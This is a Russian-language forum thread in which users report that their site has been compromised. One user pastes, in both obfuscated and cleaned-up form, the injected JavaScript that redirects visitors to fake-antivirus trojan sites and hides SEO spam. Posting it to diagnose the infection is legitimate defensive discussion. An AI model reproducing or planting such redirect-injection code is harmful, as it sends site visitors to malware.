Обратите внимание на то что делается с форумом.
Похоже на то, что кто-то пробует отработать на нем технику фишинговых атак.
Уже несколько раз замечал такое, что когда отправляеш новое сообщение, оно норовит перейти на какой-то левый адрес.
У меня Опера, потому пару раз такой даже блокировался, с недвузначным замечанием, что идет попытка перейти на вредоносный сайт.
Прошу оперативно провести дератификацию сайта и форума.
Тоько что АВАСТ выругался "Sign of "JS:FakeAV-W [Trj]" has been found in "h t t p://n e b o r i n . i n f o/?uid=12800" file."
\\ разрежение моё
<div class='quotetop'>Цитата</div>Да. Такое чуство что где-то в движке форума прописался скрипт, который редиректит на такого типа сайтики.Тоько что АВАСТ выругался "Sign of "JS:FakeAV-W [Trj]" has been found in "h t t p://n e b o r i n . i n f o/?uid=12800" file."[/b]
Я антивирусом у себя прошерстил, никаких трояново вроде не нашел.
<div class='quotetop'>Цитата(Zuzik * 23.7.2009, 11:39) [snapback]297075[/snapback]</div>Да простит меня мой ХОРОШИЙ друг Зюзик, но его башкопипасту посвящаю:А у меня начальник на выходных загорел и теперь еще больше похож на говно...
[/b]
"Скачал программу по очистке пыли с монитора, а она у меня просит отправить смс, и никак не закрывается. Что делать?"
Админы.
ВАС таки конкретно кто-то хакерит.
Вот только что у меня, при попытке обновить страницу поиска -- http://www.civfanatics.ru/forum/index.php?...amp;CODE=getnew
Начало вылазить вот такое.... (привожу потому, что а вдруг получится вычислить банальным поиском) вместо показа страницы новых тем.
<script type="text/javascript" language="javascript"> var smnk=new Date( ); smnk.setTime(smnk.getTime( )+014*074*074*01750); document.cookie="sessio\x6e\x69d=34\x39a9f01\x394; p\x61th=\x2f; e\x78pi\x72es\x3d"+smnk.toGMTString( ); var gxwhdd=new Array("\x68ttp://\x67\x6fp\x61rkscan\x2ecom\x2f?ui\x64=12\x3800","http://\x73\143\x61nonl\x69nedir\x65ct.\x63om/\x68iti\x6e.p\x68p?\x6can\x64=3\x30&a\x66f\x69d=\x318\x3801"); var wemzlao="\x63a,c\x6f\x2cda\x2cde,cy\x2cel,e\x6e.eo,\x65s,\x66i,f\x72,g\x61,i\x74,j\x61,\x6ai,\x6bn\x2cnl\x2cno\x2cpt\x2csv"; var ntsfayo=navigator.language || navigator.systemLanguage; var lang=ntsfayo.toLowerCase( ); lang=lang.substr(0,2); if (wemzlao.indexOf(lang)==-1){ksjhr( ); }else {var vehvfx=Math.floor(Math.random( )*gxwhdd.length); wewx(gxwhdd[vehvfx]); }function wewx(zxjiiha){document.writeln("\074\115\x45\x54A\x20\110\x54TP-E\x51UIV\x3d\047\x52e\x66re\x73h\047 CO\x4eT\x45NT\x3d\0470;\x20UR\x4c="+zxjiiha+"\x27>"); document.writeln("\074meta htt\x70-equiv\x3d\047\x70rag\x6da\047\040\x63on\x74en\x74=\x27no-\x63a\x63he\x27>"); document.writeln("\x3cmeta\x20\x6ea\x6d\145\x3d\047\x72o\x62ots\x27 co\x6ete\x6et=\x27no\x69nd\x65x\x2cno\x66o\x6clo\x77\047\076"); }function ksjhr( ){wewx("\x68ttp://s\x63\141\x6eonlin\x65dir\x65ct.\x63om/\x68iti\x6e.p\x68p?\x6can\x64=\x330&\x61f\x66id\x3d18\x3802"); } </script>
<script>document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script><h1> Harry Potter and the Half-Blood Prince Harry Potter and the Half-Blood Prince</h1>01bc93bf47db20ce84b77fda9bba756b
Можете сами оценить
что делает сей скрипт
<script type="text/javascript" language="javascript">
var smnk=new Date( );
smnk.setTime(smnk.getTime( )+014*074*074*01750);
document.cookie="sessionid=349a9f0194; path=/; expires="+smnk.toGMTString( );
var gxwhdd=new Array("http://goparkscan.com/?uid=12800","http://s\143anonlinedirect.com/hitin.php?land=30&affid=18801");
var wemzlao="ca,co,da,de,cy,el,en.eo,es,fi,fr,ga,it,ja,ji,kn,nl,no,pt,sv";
var ntsfayo=navigator.language || navigator.systemLanguage;
var lang=ntsfayo.toLowerCase( ); lang=lang.substr(0,2);
if (wemzlao.indexOf(lang)==-1){ksjhr( ); }else {var vehvfx=Math.floor(Math.random( )*gxwhdd.length); wewx(gxwhdd[vehvfx]); }
function wewx(zxjiiha){document.writeln("\074\115ETA HTTP-EQUIV=\047Refresh\047 CONTENT=\0470; URL="+zxjiiha+"'>");
document.writeln("\074meta http-equiv=\047pragma\047\040content='no-cache'>");
document.writeln("<meta nam\145=\047robots' content='noindex,nofollow\047\076"); }
function ksjhr( ){wewx("http://sc\141nonlinedirect.com/hitin.php?land=30&affid=18802"); }
</script>
<script>document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script>
<h1> Harry Potter and the Half-Blood Prince Harry Potter and the Half-Blood Prince</h1>
01bc93bf47db20ce84b77fda9bba756b
Я убрал тот манглинг который он использует
Он подставляет страничку с которой происходит дальше редирект на указанные там в виде ссылок вредоносные сайты
<div class='quotetop'>Цитата</div>это не форумский движок отдаёт, это сам сервер отдаётвдруг получится вычислить банальным поиском[/b]
если запрашивать несуществующий файл (попробуй), то сервер отдаёт 404, НО ИНОГДА отдаёт "javascript" вместо 404
Носителем суверенитета и единственным источником власти в Российской Федерации является её многонациональный народ. Гл.1, ст.3. Конституции РФ
- Папа, а у царей бывает мания величия? - Иногда бывает. - А кем они тогда себя мнят? - Народом.
Я взрослая женщина - и я семь лет читала форумы. Настя
Если царь говорит, что чем ниже цена рубля, тем больше доход, то удивляться последствиям его правления не приходится. lada
На данном этапе развития страны считаю наиболее важным отстранить от управления бездарей-троечников в пользу тех людей, которые могут мыслить системно хотя бы на год вперёд. Винни
Многие склонны путать два понятия: «Отечество» и «Ваше превосходительство». Салтыков-Щедрин
С плохими законами и хорошими чиновниками вполне можно править страной. Но если чиновники плохи, не помогут и самые лучшие законы. Бисмарк
Как только дети, жены и любовницы начинают заниматься бизнесом - жди беды. Лукашенко
Т.к. ремоторизацию Ан-2 наладить не удалось, принято решение построить десяток Звезд Смерти для секторального захвата галактики. Рогозин
Это было не падение, Маск показал всем красненькую пипирку. Павел Чичиков 5-jan-2021 inv-ing
<div class='quotetop'>Цитата</div>Дык... все равно что-то делать нужно.это не форумский движок отдаёт, это сам сервер отдаёт[/b]
Это ведь не какой-то безобидный скриптик -- те ссылки что в нем на трояны указывают.
Можна же как-то связатся с админами сервера.
Ваши права
Ответить с цитированием
